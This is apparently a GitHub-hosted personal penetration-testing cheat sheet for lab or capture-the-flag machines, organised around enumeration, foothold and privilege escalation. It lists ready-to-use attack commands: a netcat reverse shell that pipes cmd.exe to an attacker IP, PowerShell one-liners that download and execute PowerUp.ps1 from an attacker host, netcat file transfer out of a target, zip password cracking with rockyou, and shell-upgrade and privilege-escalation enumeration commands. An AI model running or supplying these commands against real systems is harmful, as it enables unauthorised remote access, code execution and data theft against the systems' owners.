-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathMy cheat sheet
93 lines (73 loc) · 3.41 KB
/
My cheat sheet
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
Enumeration-Foothold-Privelege Escalation
--------------------------------------------------------------------
https://www.explainshell.com/ - Useful for Checking what shell commands mean
-------------------------------------------------------------------------------
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.28 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.28
Searches active ports
---------------------------------------------------------------------------------
Reverse Shell cheat sheet
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
--------------------------------------------------------------------
Full tty shell
SHELL=/bin/bash script -q /dev/null
----------------------------------------
nikto -h <ip>
--------------------------------------
dirb http://<host>
-----------------------
execute -f nc.exe -a "-e cmd.exe 10.10.14.28 1234"
--------------------------------------------------
running a mass scan then a nmap seems like a better way to go
masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000
Essentially it becomes faster than an nmap scan for all ports
then nmap these ports
-------------------------------------------------
sudo -l
see what commands you can running
---------------------------------------------
python -m SimpleHTTPServer 8080
--------------------------------------
To recieve
nc -l -p 3333 >16162020_backup.zip
To send
nc -w 3 10.10.15.19 3333 < 16162020_backup.zip
------------------------------------------
fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
-----------------------------------------
sudo date -s "$(wget -qSO- --max-redirect=0 10.10.10.175 2>&1 | grep Date: | cut -d' ' -f5-8)Z"
Gives the date of the server
----------------------------------------
Windows Privilege Escalation Cheat Sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
-----------------------------------------
Shell command in meterpreter to give the shell
Then python to give python shell or Shell=...
---------------------------------
(New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip")
iex (New-Object Net.WebClient).DownloadString(‘http://10.10.14.114/PowerUp.ps1’)
iex (New-Object Net.WebClient).DownloadFile('http://10.10.14.114:3333/PowerUp.ps1','C:\inetpub\wwwroot\Media\1035\PowerUp.ps1')
---------------------------------------
dir /s *foo*
Searching on windows cli
---------------------------------------
wget http://jh2i.com:50011/site/flag.php --max-redirect 120
curl -L --max-redirs
---------------------------------------
python3 -c "import pty;pty.spawn('/bin/bash')"
-------------------------------------
Payloads
https://github.com/swisskyrepo/PayloadsAllTheThings
------------------------------------------
Capabilities of the files
getcap -r / 2>/dev/null
-------------------------------------------
ssh -i id_rsa username@ip
--------------------------------------------
grep -nrli phrasetofind
Generally usernames you are looking for
--------------------------------------------
find / -type f -newermt "2020-09-14" ! -newermt "2020-09-20" 2>/dev/null -ls
------------------------------------------------------------------
cat masscan_output | grep "open port" | awk '{print $4}' | tr '\n' ',' | tr -d '/tcp'
--------------------------------------------------------------